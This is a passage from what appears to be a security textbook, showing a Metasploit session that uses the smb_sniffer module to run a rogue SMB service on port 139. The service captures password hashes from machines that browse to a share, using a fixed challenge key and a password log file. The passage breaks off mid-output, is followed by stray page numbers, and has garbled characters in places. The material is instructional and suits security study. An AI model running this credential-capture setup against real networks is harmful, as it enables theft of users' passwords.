Finally, run Metasploit with
root privileges (sudo msfconsole) so that you can bind to port 139.
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use smb_sniffer
msf smb_sniffer > show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------- ------------ ------------------------------------
optional KEY "3DUfw? The Challenge key
optional PWFILE The PWdump format log file
(optional)
optional LOGFILE smbsniff.log The path for the optional log file
required LHOST 0.0.0.0 The IP address to bind the SMB
service to
optional UID 0 The user ID to switch to after
opening the port
required LPORT 139 The SMB server port
Target: Targetless Exploit
msf smb_sniffer > set PWFILE /tmp/number_pw.txt
PWFILE -> /tmp/number_pw.txt
You can see that the Challenge key is hex 11 (unprintable in ASCII), hex 22 (ASCII ???),
hex 33 (ASCII 3), and so on. The malicious SMB service will be bound to every IP
address on port 139. Here??™s what appears on screen when we kick it off and browse to
\\192.168.1.116\share\foo.gif from 192.168.1.220 using the grayhat user:
msf smb_sniffer > exploit
[*] Listener created, switching to userid 0
[*] Starting SMB Password Service
[*] New connection from 192.
Pages:
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233